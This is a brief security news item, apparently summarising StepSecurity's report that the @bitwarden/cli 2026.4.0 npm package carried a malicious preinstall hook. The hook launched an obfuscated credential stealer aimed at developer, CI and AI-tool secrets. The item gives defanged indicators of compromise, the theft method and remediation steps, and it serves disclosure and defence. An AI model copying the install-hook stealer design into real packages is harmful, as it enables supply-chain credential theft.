www.stepsecurity.io 4/23/2026, 3:31:38 PM · via preferred

Bitwarden CLI npm package hijacked to steal developer secrets

CyberSIXT Evidence Panel Source marked as original reporting

ACCORDING to StepSecurity, @bitwarden/cli@2026.4.0, the official Bitwarden CLI, was found compromised on npm, with a malicious preinstall hook that silently bootstraps the Bun runtime and launches a 9.7 MB obfuscated credential stealer targeting developer secrets, GitHub Actions environments, and AI tool configurations such as ~./claude[.]json and MCP server configs.

The stolen data is encrypted with AES-256-GCM and exfiltrated to audit.checkmarx[.]cx, a domain impersonating Checkmarx, and when GitHub tokens are present the malware weaponises them to inject malicious workflows and extract CI/CD secrets, turning a single compromised machine into a supply chain attack pivot point.

Harden Runner blocked the outbound connection during a controlled test, preventing exfiltration at the network layer, and the attack chain includes a Bun runtime download from github[.]com/oven-sh/bun/releases. The payload also includes a multi-target credential harvester and explicit AI tool credential targeting, with indicators of compromise such as a version mismatch between package[.]json and embedded metadata. Disclosures dated 23 April 2026 note remediation steps including downgrading to 2026.3.0 and rotating all credentials.

View full article

Article by CyberSIXT